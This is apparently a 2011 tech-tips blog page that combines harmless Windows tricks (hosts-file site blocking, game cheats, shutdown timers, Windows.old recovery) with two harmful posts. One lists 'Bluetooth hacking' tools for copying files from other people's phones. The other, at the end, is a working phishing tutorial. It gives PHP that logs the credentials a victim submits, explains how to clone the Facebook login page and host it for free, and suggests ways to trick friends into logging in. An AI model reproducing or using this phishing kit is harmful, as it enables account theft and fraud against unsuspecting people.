Wednesday, April 20, 2011

Create a simple firewall protection to block certain websites!

Here I have already posted several articles on how to unblock several websites like orkut, facebook bebo or any other in colleges or offices using proxy software and proxy sites. But today this article will be a total turn-around as how you can create a simple firewall to block certain websites at your home being accessed by your child.
This trick does not require any special skill but only a slight modification into the system host file with the sites names included those you want block access keep in mind that this process is totally reversible, if later you want to gain access any particular sites remove from the list. Below is the process to create this simple firewall protection as this can also be used to stop spam sites:

1. Click on start and then Run menu (You can also use Windows Key + r to open the run window)
2. Type notepad C:/Windows/System32/drivers/etc/hosts
as it is the bold letters in the text box (Copy and paste will be the best solution)
3. This will open the notepad editor now type 127.0.0.1 (which is the local host) and give a space then type the name of the site you want to block e.g
127.0.0.1 orkut.com and save the file.

By this way you can add many as site in the list and in case if you want to gain access to any site you have blocked repeat the first two process and then from notepad document remove that particular site.
Hope you have liked this trick very much and I deserves a feedburner’s subscription isn’t so?

XP Game Cheat Codes: Freecell; Hearts; Minesweeper; Pinball

Do you love playing Windows Default games freecell hearts minesweeper or pin ball but finally get irritated with every defeat or want a very easy solution to conquer the best result. Then you need some of the best cheat codes to play them even much better and in no way computer will be able to defeat or surplus you. So here are the tricks:
FreeCell Secret – Instant Win:Instructions – Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.
Secret – Hidden Game Modes: Instructions – In the “Game” menu choose “Select Game”. Enter -1 or -2 to activate the hidden game modes.

Hearts
Secret – Show All Cards
Instructions – Edit this registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts and create a new String value named ZB with a Data value of 42. Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards.
Background – This secret is a reference to Douglas Adams’ book the Hitch Hiker’s Guide to the Galaxy. ‘ZB’ is the initials of the character Zaphod Beeblebrox, the Galactic President. ‘42′ is the answer to The Ultimate Question Of Life, the Universe and Everything.
Minesweeper
Secret – Reveal Mines

Instructions – Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.
Secret – Stop Timer
Instructions – Launch Minesweeper and start a game so the timer starts counting, then press the Windows Key + D to show the desktop. Now when you select minesweeper from the taskbar you can continue playing with the timer stopped.
Pinball
Secret – Extra Balls
Instructions – Type 1max at the start of a new ball to get extra balls.
Secret – Gravity Well
Instructions – Type gmax at the start of a new game to activate the Gravity Well.
Secret – Instant Promotion
Instructions – Type rmax at the start of a new game to go up in ranks.

How to Format USB Stick with NTFS File System

The advantage of NTFS file system is more security options and fast. Normally USB drive capacity is very small enough that NTFS is not recommended. But, nowadays USB drives are coming with larger capacity also. So we can format USB drive with NTFS to have more security options.
NTFS enabled USB Drives are write-able only on one PC and becomes read only on all other PCs. Hence, we can read and write on our own PC and transfer files to elsewhere without any fear of virus.
In XP, only FAT and FAT32 file systems are available in format options, use the below steps to format in NTFS File System.
1). Insert USB drive in your PC
2). Go to Device Manager (Start>Run>devmgmt.msc)
3). Select Disk Drives and expand
4). Right Click on USB drive and select Properties
5). Go to policies tab and select Optimize for performance and press OK
6). Open My Computer, Click on USB Drive and select Format Option

Now you can have NTFS option there.

Recover Forgetted Windows Password: Simple and easy solution

Few days back I have posted an article on how you can recover the lost password from windows 7 “Recover lost password of windows 7” but with that you have to go through a download of 400 mb iso file… but if you are looking for very simple software then Windows Password Unlocker will be the best but remember this is not free.. but you can test it for free (Links provided)
1. Login to a computer that can link to Internet. Download Windows Password Unlocker and install it on that PC. Note that this is a .ISO file. Burn the .ISO file to a CD or a USB flash drive.
2.Use the newly created CD/USB to the locked computer.
3. Re-booted the locked computer (it’s necessary for you to change your computer’s Setup to make it boot from CD drive or USB drive) and then followed the process of instructions. Just a few steps, the old password was removed.
4. Setting new password.
Though the method provided is very simple but if you love only the free stuffs then make your way towards the solution mentioned in the first paragraph… I hope you would like that one also and do subscribe to the feed burner subscription for daily newsletter. However you can also visit the CELLPOINT forum for your queries and questions.
How to Shutdown PC with Timer: this is not a very common question but is as important when there is a need to shutdown any pc at any given interval of time. This is where the tricks mention below will work for you. Below you will find some cool tricks to shutdown your PC with the help of a Timer.
METHOD 1:
Do you know that you can make your PC shutdown at a time u wish to?
Here is the trick! How To Make A Shutdown Timer!
Step 1:
Right click on your desktop and choose “New=>shortcuts“.
Step 2:
In the box that says “Type the location of the shortcut“,
type in “shutdown -s -t 3600” without the quotation marks and click next.
Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.
Step 3:
Make up a name for the shortcut and you’re done.
You can change the icon by right clicking=>properities=>change icon=>browse.
To abort:
To make an abort key to stop the shutdown timer just create another shortcut and make the “location of the shortcut” to “ shutdown -a” without the quotes.

METHOD 2
Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in
start=>Run
Type Code: at 11:35 shutdown -s
To abort
Code: shutdown -a
Note: all time are in 24hr, example u would like to shutdown at 8:30pm, you should type
“at 20:30 shutdown -s” without quote

METHOD 3
you can use a batch for that as well it makes it easier to use
just run the batch and enter the time you want it to shutdown
shutdown.bat
Type Code:
@echo off
title Scheduled Shutdown Batch Example by chacha1234
color A
echo Enter Time To Shutdown (example 19:30)
set /p stime=
cls
at %stime% “”shutdown -s -t 00″” >nul
echo Your PC Will Auto Shutdown At %stime%
echo Press Any Key To Exit
pause >nul
exit
also you can add -c “desired message” at the end of the shutdown command
for example
shutdown -s -t 60 -c “Shutdown Pc”
using this command u can also schedule ur pc to restart
Save Now
for example
shutdown -r -t 60 -c “Restarting Pc”...

Recovering Old Windows Files and applications after Windows Upgrade to 7

Few days back one of my friend has upgraded his system from Windows Xp to Seven and caught into a disaster as he said to me. What he said that he has only updated his operating system without formatting his system drive and was thinking that all the data on the desktop will be intact so he just ignored to take a backup.
After the installation finishes he was shocked to find that he has got the new fresh desktop, none of his old files and folders were there. He has just nearly pulled his hair before he called me as what can be done to retrieve his desktop data.
So now if you have also came across the similar situation then don’t panic as there is a very simple step to find all your data stored. As you have not formatted your system drive, nothing will be lost.
With the any version update or installation of any windows using without format windows installation backs-up all the files in a folder as windows.old.
The Windows.old folder contains the following folders:
•    Windows
•    “Documents and Settings”
•    “Program Files”

While all the “My Documents” data is located in the Documents and Settings folder, all the programs installed earlier are now in the Program Files folder.
YOu can open this folder Clicking Start, type %systemdrive%\Windows.old in the Start Search box, and then press ENTER. and search here for all the previous files..

Shutdown windows in just 5 second

This is a common factor with Windows that the more the programs you have installed in the more time it takes while processing the shutdown or restart process; sometimes which is very irritating. If you are also among those people who use a lot of software at any time and get annoyed with the way windows consumes time then the following software application can be very useful for you.
Super Fast Shutdown or Super Fast Reboot are two tools that can shutdown and reboot the computer within 5 seconds flat! While some people do not like quick or fast shutdown, there are few who have no problems with that.
So if your pc makes you to wait for a long time before you can press the power off switch then the above application can be your helping hand… enjoy..
Download Fast Shutdown
Note: Some people has claimed this work the same way as if we have pressed the power button for a very long time and this way it can corrupt our data but according to the publisher website there is not any reported crash so far. So it is up to you whether you use it or not?

Completely uninstall McAfee antivirus from the system

If you are using McAfee Antivirus and have changed your mood to try any other Antivirus then probably the best you can do is….. uninstall the current McAfee Installaion and then start the process of installation of new antivirus we would like to try. Though the above process looks very simple but sometimes it is far difficult then it seems to be?As to shift to any other brand Antivirus it becomes essential to completly remove all the traces from the previously installed version but sometimes Mcafee Uninstaller fails to do so. It left out some of the registry entries or the supporting files causing the problems to the new installation…. if so is the case then you can use the VSCleanUP tool from McAfee to solve out the problem.
Download VSCleanUp from the link here and then double click on the download to run the application it will then automatically calcualte the time to be taken to complete the process.
Once you run this software, you could see several files being created in the folder where you download this clean up tool. Out of this 10 files, 9 will be deleted once the McAfee software has been completely removed from and the system and rebooted.
Hope this will sort out your problem.. plz let me know if so in comment section.

Bluetooth Hacking Software

Bluetooth Hacking software & tools

Bluetooth Hacking software & tools for your mobile phones.Here is list of some bluetooth hacking softwares.Here is some free bluetooth hacking software that would let you do a lot more fun with your mobile phones

1.MagicBlueHack: you can download this software from here

http://adf.ly/CT16

2.BT File Manager : Application to browsing and copy files from other phones connected via Bluetooth.

Download this from here

http://adf.ly/CT1R

3.Mobilewitch Bluetooth Remote Control :Mobilewitch Bluetooth Remote Control is a free of charge program that can be used to control your computer from distance. The main purpose of this software is to turn your mobile phone into a universal PC remote control.

download this software from here..

http://www.getjar.com/mobile/26591/mobilewitch-bluetooth-remote-control/

Use these bluetooth hacking software and tools on your own responsibility.Read manual of these software to operate them
Enjoy

How to Hack Facebook Password ?

How to hack facebook Account password

We will we use very popular method to hack facebook account password.That is Phishing.This is one of the best method to hack facebook account password.This will work only if your friend don’t know about this method of hacking facebookFor this We need three files:

1.Fake facebook login page
2.Php file
3.Text file to store password

Create your php file

1.Open notepad and copy this code:

header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>

2.Now save this as phishing.php
Your php file is now created
If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt

Create facebook fake login page

Now go to http://www.facebook.com and right click / View Source.Copy source in notepad and save it as facebooklogin .html .Now open source code of this html file
We need to find the place where Login code in facebook page that where send the user after clicking on it.
Now Press crtl-f after opening source code and search for this code
action=anything.
In this case we have this

action=”https://login.facebook.com/login.php?”

We replace that part with:

action=”phishing.php”

Save your facebooklogin.html file

Text file

Create a blank text file and name it password.txt

Now upload all the three files Facebooklogin.html,phishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake facebook login page by going to http://yoursite.110mb.com/Facebooklogin.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored.
You can use
http://www.justfree.com/
http://www.ripway.com/
also or any other free hosting site.

Suppose you register with name facebookhack.Your link will be http://www.facebookhack.justfree.com/
After uploading files your phishing link will be http://www.facebookhack.justfree.com/facebooklogin.html
Send this link to your friend if they login there their password will be save at the server .
You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like

“Use this on your own responsibility for educational purpose only“..........